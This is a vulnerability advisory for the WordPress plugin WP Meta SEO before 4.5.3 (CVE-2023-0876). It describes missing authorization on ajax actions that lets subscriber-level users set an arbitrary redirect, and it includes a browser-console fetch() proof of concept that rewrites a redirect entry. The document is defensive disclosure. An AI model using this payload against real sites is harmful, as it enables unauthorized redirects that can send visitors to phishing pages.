WordPress Plugin Vulnerabilities

WP Meta SEO < 4.5.3 - Subscriber+ Improper Authorization causing Arbitrary Redirect

Description

The plugin does not authorize several ajax actions, allowing low-privilege users to make updates to certain data and leading to an arbitrary redirect vulnerability.

Proof of Concept

Visit, for example, the page <yourhost>?p=99999. This should create the first auto redirect entry in the wp_wpms_links table with ID 1. Now log in as a subscriber and enter the following js code in your web console on the dashboard:

fetch( 'admin-ajax.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body:'action=wpms&wpms_nonce=' + wpms_localize.wpms_nonce + "&task=update_link_redirect&link_id=1&link_redirect=https://google.com" } );

Now load <yourhost>?p=99999 again and notice that it redirects to `https://google.com`.

Affects Plugins

Plugin icon
wp-meta-seo
Fixed in 4.5.3

References

CVE
CVE-2023-0876

Classification

Type
REDIRECT
OWASP top 10
A1: Injection
CWE
CWE-601
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea

Timeline

Publicly Published
2023-02-27 (about 9 months ago)
Added
2023-02-27 (about 9 months ago)
Last Updated
2023-02-27 (about 9 months ago)

Other

Published
Title
Published
2019-09-05
Title
WordPress 5.2.2 - Potential Open Redirect
Published
2023-11-23
Title
Landing Page Builder < 1.5.1.6 - Open Redirect
Published
2022-03-29
Title
English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
Published
2023-02-06
Title
Pie Register < 3.8.2.3 - Open Redirect
Published
2021-02-16
Title
Ninja Forms < 3.4.34 - Administrator Open Redirect